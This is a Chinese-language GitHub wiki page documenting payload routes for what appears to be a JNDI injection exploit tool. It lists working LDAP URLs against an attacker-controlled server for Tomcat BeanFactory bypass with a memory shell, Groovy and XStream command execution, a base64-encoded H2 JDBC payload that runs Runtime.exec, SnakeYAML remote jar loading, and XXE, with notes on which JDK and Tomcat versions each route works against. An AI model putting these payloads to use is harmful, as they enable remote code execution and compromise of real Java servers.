-
Notifications
You must be signed in to change notification settings - Fork 189
1 、JNDI Routing
炁 edited this page Nov 12, 2024
·
38 revisions
JNDI injection payload 的Gadget与Payload不区分大小写。
对于 JNDI injection payload 是这一处的说明 ----+
|
jndi:ldap://127.0.0.1:1389/TomcatBypass <-----+ /M-EX-MS-TSMSFromJMXS/shell/LXB3IDEyMzQ1Ng==
Oracle JDK 11.0.1, 8u191, 7u201, and 6u211 及以后的版本,为了限制LDAP协议的JNDI利用,将系统属性 com.sun.jndi.ldap.object.trustURLCodebase 的默认值设置为 false ,即默认不允许 LDAP 从远程地址加载 objectfactory 类。
org.apache.naming.factory.BeanFactory
依赖:
- javax.el.ELProcessor
9.0.63后forceString选项已作为安全强化措施删除。
tomcat-embed-core || tomcat-catalina <= 9.0.62 (Spring Boot Starter Tomcat <= 2.6.7)可用。 +-
向 javaSerializedData 属性中写入 gadget 的序列化数据
依赖:
- groovy.lang.GroovyShell
ldap://127.0.0.1:1389/groovy/command/calc
通过 com.ibm.ws.client.applicationclient.ClientJ2CCFFactory 构造类加载。
JDK版本 < 20
可选factoryType
org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory
org.apache.tomcat.dbcp.dbcp.BasicDataSourceFactory
org.apache.commons.dbcp2.BasicDataSourceFactory
org.apache.commons.dbcp.BasicDataSourceFactory
com.alibaba.druid.pool.DruidDataSourceFactory
org.apache.tomcat.jdbc.pool.DataSourceFactory
自行构造任意JDBC Payload
ldap://127.0.0.1:1389/jdbc1/org.h2.Driver/org.apache.tomcat.jdbc.pool.DataSourceFactory/base64/amRiYzpoMjptZW06dGVzdDtNT0RFPU1TU1FMU2VydmVyO2luaXQ9Q1JFQVRFIFRSSUdHRVIgdGVzdCBCRUZPUkUgU0VMRUNUIE9OIElORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMgQVMgJy8vamF2YXNjcmlwdApqYXZhLmxhbmcuUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYygiY2FsYyIpJw==
通过设置 javaRemoteLocation 来使用 com.sun.jndi.ldap.Obj#decodeRmiObject*//85207 还原 Factory 对象,从ldap转换成rmi进行绕过
ldap://127.0.0.1:1389/ldap2rmi/rmi参数
依赖:
- org.yaml.snakeyaml.Yaml
ldap://127.0.0.1:1389/snakeyaml/url/base64/aHR0cDovLzEyNy4wLjAuMS8xLmphcg==
依赖:
- com.thoughtworks.xstream.XStream
ldap://127.0.0.1:1389/xstream/command/calc
Tomcat中的 org.apache.catalina.users.MemoryUserDatabaseFactory
ldap://127.0.0.1:1389/memoryxxe/url/base64/aHR0cDovLzEyNy4wLjAuMS9leHAueG1s